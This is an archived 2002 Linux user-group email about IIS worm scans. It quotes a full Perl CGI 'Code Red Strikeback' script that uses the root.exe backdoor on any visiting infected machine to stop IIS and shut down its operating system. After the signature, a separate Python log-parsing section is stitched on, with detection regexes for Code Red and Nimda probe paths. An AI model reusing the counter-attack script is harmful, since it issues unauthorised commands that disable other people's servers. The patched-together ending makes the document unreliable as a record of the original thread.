From: Mick Ohrberg (micke@kc.rr.com)
Date: 07/07/02


From: "Mick Ohrberg" <micke@kc.rr.com>
Subject: RE: Web Server Scans
Date: Sun, 7 Jul 2002 10:54:28 -0500
Message-ID: <000001c225d0$627fc080$6400a8c0@mick>


 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I can't remember if this is for Code Red or Nimda...
- -------------------8<----------------------------
#!/usr/bin/perl -w
# default.ida in perl
# Copyright 2001 Sam Phillips <sam@dasbistro.com>
# ideas borrowed from Erin Quinlan <erin@dasbistro.com>
# ideas provided by various Internet folk, and all those darn
# Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers
# (http://www.pigdog.org)
#
# Things that this should do...
# * Send email to the machine owner
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

use LWP::UserAgent;

$|++;

print "Content-Type: text/html\n\n";

if (length ($ENV{QUERY_STRING}) > 0) {
    my $ua = new LWP::UserAgent;
    $ua->agent ("Code Red Strikeback");
    $ua->timeout (20);

    my $iis_stop_req = new HTTP::Request (GET =>
        "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");

    print "probulating... <br>";

    my $resp = $ua->request ($iis_stop_req);
    if ($resp->is_success) {
        print "Appears we have shut down IIS...<br>";
        my $server_stop_req = new HTTP::Request (GET =>
            "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
        $resp = $ua->request ($iis_stop_req);

        if ($resp->is_success) {
            print "Appears that we have also shutdown whatever OS too...<br>";
        }

        # ok this will do magic email stuff when I get a chance to write it.

    } else {
        print "<h2>Boy! Are you yankin' my chain?!?</h2>";
    }
}

print <<EOF;
    <p>
 <h1>Code Red Counter Attack!</h1>
    </p>
    <p>
 <H2>If you are reading this page, then you are probably curious...</H2>
    </p>
    <p>
 This page is actually a script that will connect to your machine and
 try to shut it down. Since you are seeing this you probably aren't a
 Code Red infected box.
    </p>
    <p>
 This will only work if you are infected with the "code red" virus which
 isn't really a virus but is a part of the Microsoft Internet
 Information Server (IIS).
    </p>
    <p>

EOF
- -------------------8<----------------------------
Well, I guess Code Red. Rather harsh method of trying to stop the
infection of this virus...

| -----Original Message-----
| From: owner-kclug@marauder.illiana.net
| [mailto:owner-kclug@marauder.illiana.net] On Behalf Of
| dattaway@attaway.net
| Sent: Sunday, July 07, 2002 7:18 AM
| To: 'kclug@kclug.org'
| Subject: Re: Web Server Scans
|
|
| On Sat, 6 Jul 2002, chuckx wrote:
|
| > Those log entries are the result of a common IIS virus
| affectionately
| > referred to as Nimda.
| >
| > It's nothing to worry about.
| >
| > If you want you logs to not be so cluttered, check out the
| following
| > thread: http://www.webmasterworld.com/forum23/620.htm
|
| I've heard another great way to eliminate nimda entries is to
| set up the real web pages on a virtual server, leaving the
| default for nimda. From what I am told, nimda does not do
| hostnames, just the numbers and it will leave all the virtual
| logs alone.
|
|
|
|
| KC Linux Users Group -- to unsubscribe send mail to
| majordomo@kclug.org Enter without the quotes in body of
| message "unsubscribe kclug"
|

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPShnPUkUEW0dd/1DEQLujQCfaMmocUd3uhFtWr18lRBim/ROmNAAoJWt
fDQjl21szje3ovPF4KOjXTxc
=oT7/
-----END PGP SIGNATURE-----
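Rather than striking back at the requesting host, the defensive answer to the log clutter discussed in this thread is to recognise the worm probes and count them. The following is an added Python example, not part of the original messages or of the Perl script above; the Apache common-log lines and the IP addresses in it are constructed for illustration, and the Code Red (default.ida) and Nimda (root.exe / cmd.exe / encoded traversal) request patterns are the well-known signatures of those worms.

```python
import re
from collections import Counter

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Jul/2002:03:11:02 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
192.0.2.10 - - [07/Jul/2002:03:11:03 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
192.0.2.10 - - [07/Jul/2002:03:11:04 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
192.0.2.10 - - [07/Jul/2002:03:11:05 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
198.51.100.7 - - [07/Jul/2002:04:02:17 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 277
203.0.113.5 - - [07/Jul/2002:05:30:00 -0500] "GET /index.html HTTP/1.1" 200 1043
"""

# Apache common log format: client IP, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Request-path signatures, checked in order; first match wins.
SIGNATURES = [
    # Code Red / Code Red II: a long run of N or X filler after /default.ida?
    ("code-red", re.compile(r"^/default\.ida\?[NX]{10,}")),
    # Nimda: root.exe backdoor left by Code Red II, cmd.exe via Unicode/double-encoded traversal
    ("nimda", re.compile(r"(?i)(root\.exe|cmd\.exe|%255c|%c1%1c|%c0%af)")),
]


def classify(path):
    """Return the worm family a request path matches, or None for normal traffic."""
    for family, rx in SIGNATURES:
        if rx.search(path):
            return family
    return None


def summarize(log_text):
    """Count worm probes per (source IP, family) and the number of clean requests."""
    hits = Counter()
    clean = 0
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        family = classify(m.group("path"))
        if family:
            hits[(m.group("ip"), family)] += 1
        else:
            clean += 1
    return hits, clean


if __name__ == "__main__":
    probes, normal = summarize(SAMPLE_LOG)
    for (ip, family), n in sorted(probes.items()):
        print(f"{ip:16} {family:9} {n} probe(s)")
    print(f"{normal} normal request(s)")
```

Pointing this at a real access log shows at a glance whether the entries are worm noise, as chuckx says, and which sources are scanning, without any of the counter-attack behaviour of the script above.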